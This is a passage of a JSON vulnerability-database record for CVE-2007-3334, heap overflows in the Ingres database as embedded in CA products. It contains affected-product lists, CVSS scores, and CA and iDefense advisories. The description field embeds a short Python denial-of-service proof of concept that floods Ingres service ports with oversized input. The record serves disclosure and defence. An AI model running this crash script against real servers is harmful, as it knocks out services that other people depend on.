"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter patch management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1.1"
},
{
"model": "associates unicenter lightweight portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2"
},
{
"model": "associates unicenter job management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter enterprise job manager sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter desktop management suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter desktop and server management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter database command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.11"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2.1"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.3"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter asset intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter advanced systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates etrust web access control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust network forensics",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust iam suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust audit r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates docserver",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath aion bre",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates brightstor storage resource manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor storage command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor enterprise backup for tru64",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for hp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for aix",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.0"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates advantage data transformer",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:etrust_secure_content_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ingres:database_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSEChris Anley\u203b chris@ngssoftware.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
],
"trust": 0.6
},
"cve": "CVE-2007-3334",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2007-3334",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-3334",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2007-3334",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200706-357",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. \nSuccessful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the \u0027alarkp.def\u0027 file. \n\n3) Ingres wakeup file overwrite (reported by NGSSoftware) \n[Ingres bug 115913, CVE-2007-3337, CAID 35451]\nDescription: The \"wakeup\" binary creates a file named \n\"alarmwkp.def\" in the current directory, truncating the file if it \nalready exists. The \"wakeup\" binary is setuid \"ingres\" and \nworld-executable. Consequently, an attacker can truncate a file \nwith the privileges of the \"ingres\" user. \n\n4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: An attacker can pass a long string as an argument to \nuuid_from_char() to cause a stack buffer overflow and the saved \nreturned address can be overwritten. \n\n5) Ingres verifydb local stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: A local attacker can exploit a stack overflow in the \nIngres verifydb utility duve_get_args function. This only \naffects Ingres on the Windows operating system. Reported by \niDefense as IDEF2023. This only affects Ingres on the Windows \noperating system. Reported by iDefense as IDEF2022. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a cumulative High \nrisk rating. \n\nAffected Products:\nAdvantage Data Transformer r2.2\nAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1\nAllFusion Harvest Change Manager r7, r7.1\nBrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, \n Linux and Mainframe Linux)\nBrightStor ARCserve Backup for Laptops and Desktops r11.5\nBrightStor Enterprise Backup (Unix only) r10.5\nBrightStor Storage Command Center r11.5\nBrightStor Storage Resource Manager r11.5\nCleverPath Aion Business Rules Expert r10.1\nCleverPath Aion Business Process Monitoring r10.1\nCleverPath Predictive Analysis Server r3\nDocServer 1.1\neTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2\neTrust Audit r8 SP2\neTrust Directory r8.1\neTrust IAM Suite r8.0\neTrust IAM Toolkit r8.0, r8.1\neTrust Identity Manager r8.1\neTrust Network Forensics r8.1\neTrust Secure Content Manager r8\neTrust Single Sign-On r7, r8, r8.1\neTrust Web Access Control 1.0\nUnicenter Advanced Systems Management r11\nUnicenter Asset Intelligence r11\nUnicenter Asset Management r11\nUnicenter Asset Portfolio Management r11.2.1, r11.3\nUnicenter CCS r11\nUnicenter Database Command Center r11.1\nUnicenter Desktop and Server Management r11\nUnicenter Desktop Management Suite r11\nUnicenter Enterprise Job Manager r1 SP3, r1 SP4\nUnicenter Job Management Option r11\nUnicenter Lightweight Portal 2\nUnicenter Management Portal r3.1.1\nUnicenter Network and Systems Management r3.0, r11\nUnicenter Network and Systems Management - Tiered - Multi Platform \n r3.0 0305, r3.1 0403, r11.0\nUnicenter Patch Management r11\nUnicenter Remote Control 6, r11\nUnicenter Service Accounting r11, r11.1\nUnicenter Service Assure r2.2, r11, r11.1\nUnicenter Service Catalog r11, r11.1\nUnicenter Service Delivery r11.0, r11.1\nUnicenter Service Intelligence r11\nUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1\nUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, \n r11.1, r11.2\nUnicenter Software Delivery r11\nUnicenter TNG 2.4, 2.4.2, 2.4.2J\nUnicenter Workload Control Center r1 SP3, r1 SP4\nUnicenter Web Services Distributed Management 3.11, 3.50\nWily SOA Manager 7.1\n\nAffected Platforms:\nAll operating system platforms supported by the various CA \nproducts that embed Ingres. This includes Windows, Linux, and \nsupported UNIX platforms. \n\nStatus and Recommendation:\nCA recommends that customers apply the appropriate fix(es) listed \non the Security Notice page: \nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nCA SupportConnect Security Notice for these vulnerabilities:\nIngres Security Alert\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\nImportant Security Notice for Customers Using Products That Embed \nIngres\nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\nCA Security Advisor posting: \nCA Products That Embed Ingres Multiple Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453\nIngres knowledge base document:\nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl\nReported By: NGSSoftware, and iDefense\nNGSSoftware Advisory: \nhttp://www.ngssoftware.com/research/advisories/\niDefense Advisory: \nIngres Database Multiple Heap Corruption Vulnerabilities\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546\nCVE References:\nCVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. Ingres Database Multiple Heap Corruption Vulnerabilities\n\niDefense Security Advisory 06.21.07\nhttp://labs.idefense.com/intelligence/vulnerabilities/\nJun 21, 2007\n\nI. BACKGROUND\n\nIngres is the database backend used by default in several CA products. \nThe SCM (Secure Content Manager) is one of the products that uses\nIngres. The SCM use Ingres to store quarantined virii and blocked HTTP\nrequests/replies. For more information visit the following URLs. \n\nhttp://www3.ca.com/solutions/Product.aspx?ID=1013\n\nhttp://www.ingres.com/\n\nII. The Communications\nServer is the main component responsible for receiving and handling\nrequests from the network. The Data Access Server is responsible for\nhandling requests from the Ingres JDBC Driver and .NET data providers. \nThese requests are decoded into Ingres internal formats and passed on\nto other components of the database server. \n\nThe application does not properly validate the length of attacker\nsupplied data before copying it into a fixed size heap buffer. This\nleads to an exploitable condition. \n\nIII. ANALYSIS\n\nExploitation allows an unauthenticated attacker to execute arbitrary\ncode with SYSTEM privileges. \n\nIn order to exploit this vulnerability an attacker would have to send a\nmalformed request to the database server. This requires the ability to\nestablish a TCP session on port 10916 (iigcc) or 10923 (iigcd). \n\nExploitation has been demonstrated to be trivial. \n\nIV. Previous versions may also be affected. In addition, any\napplication that uses the Ingres Database may be vulnerable. \n\nV. WORKAROUND\n\nEmploying firewalls or other access control methods can effectively\nreduce exposure to this vulnerability. \n\nVI. VENDOR RESPONSE\n\nCA has made fixes available for all supported CA products that embed\nIngres. For more information consult CA\u0027s Security Alert at the\nfollowing URL. \n\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2007-3334 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n01/16/2007 Initial vendor notification\n01/17/2007 Initial vendor response\n06/21/2007 Coordinated public disclosure\n\nIX. CREDIT\n\nThe discoverer of this vulnerability wishes to remain anonymous. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2007 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities\n# Date: 2010-08-14\n# Author: fdisk\n# Version: 2.6\n# Tested on: Windows 2003 Server SP1 en\n# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338\n# Notes: Fixed in the last version. \n# please let me know if you are/were able to get code execution \u003crr dot fdisk at gmail dot com\u003e\n \nimport socket\nimport sys\n \nif len(sys.argv) != 4:\n print \"Usage: ./CAAdvantageDoS.py \u003cTarget IP\u003e \u003cPort\u003e \u003cService\u003e\"\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \nhost = sys.argv[1]\nport = int(sys.argv[2])\nservice = sys.argv[3]\n \nif service == \"iigcc\":\n payload = \"\\x41\" * 2106\nelif service == \"iijdbc\":\n payload = \"\\x41\" * 1066\nelse:\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \npayload += \"\\x42\" * 4\n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint \"Sending payload\"\ns.send(payload)\ndata = s.recv(1024)\ns.close()\nprint \u0027Received\u0027, repr(data)\n \nprint service + \" crashed\"\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3334"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "BID",
"id": "24585"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-3334",
"trust": 3.0
},
{
"db": "BID",
"id": "24585",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "25775",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25756",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2288",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2290",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1018278",
"trust": 1.6
},
{
"db": "OSVDB",
"id": "37487",
"trust": 1.0
},
{
"db": "OSVDB",
"id": "37488",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222",
"trust": 0.8
},
{
"db": "XF",
"id": "35002",
"trust": 0.6
},
{
"db": "XF",
"id": "34992",
"trust": 0.6
},
{
"db": "XF",
"id": "34991",
"trust": 0.6
},
{
"db": "IDEFENSE",
"id": "20070621 INGRES DATABASE MULTIPLE HEAP CORRUPTION VULNERABILITIES",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "57303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57276",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92818",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"id": "VAR-200706-0395",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2025-04-10T22:57:36.934000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.actian.com/products/ingres"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://windows.microsoft.com/en-US/windows/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"trust": 2.0,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"trust": 2.0,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"trust": 1.6,
"url": "http://www.securitytracker.com/id?1018278"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/24585"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25775"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25756"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34992"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34991"
},
{
"trust": 1.0,
"url": "http://osvdb.org/37488"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"trust": 1.0,
"url": "http://osvdb.org/37487"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35002"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3334"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3334"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/35002"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/34992"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/34991"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2290"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2288"
},
{
"trust": 0.4,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "/archive/1/472192"
},
{
"trust": 0.3,
"url": "/archive/1/471950"
},
{
"trust": 0.3,
"url": "/archive/1/472197"
},
{
"trust": 0.3,
"url": "/archive/1/472193"
},
{
"trust": 0.3,
"url": "/archive/1/472194"
},
{
"trust": 0.3,
"url": "/archive/1/472200"
},
{
"trust": 0.3,
"url": "msg://bugtraq/649cdcb56c88aa458eff2cbf494b6204030a79ca@usilms12.ca.com"
},
{
"trust": 0.3,
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3334"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3336"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3337"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3336"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3337"
},
{
"trust": 0.1,
"url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:415738+htmpl=kt_document_view.htmpl"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://www.ngssoftware.com/research/advisories/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/solutions/product.aspx?id=1013"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/),"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
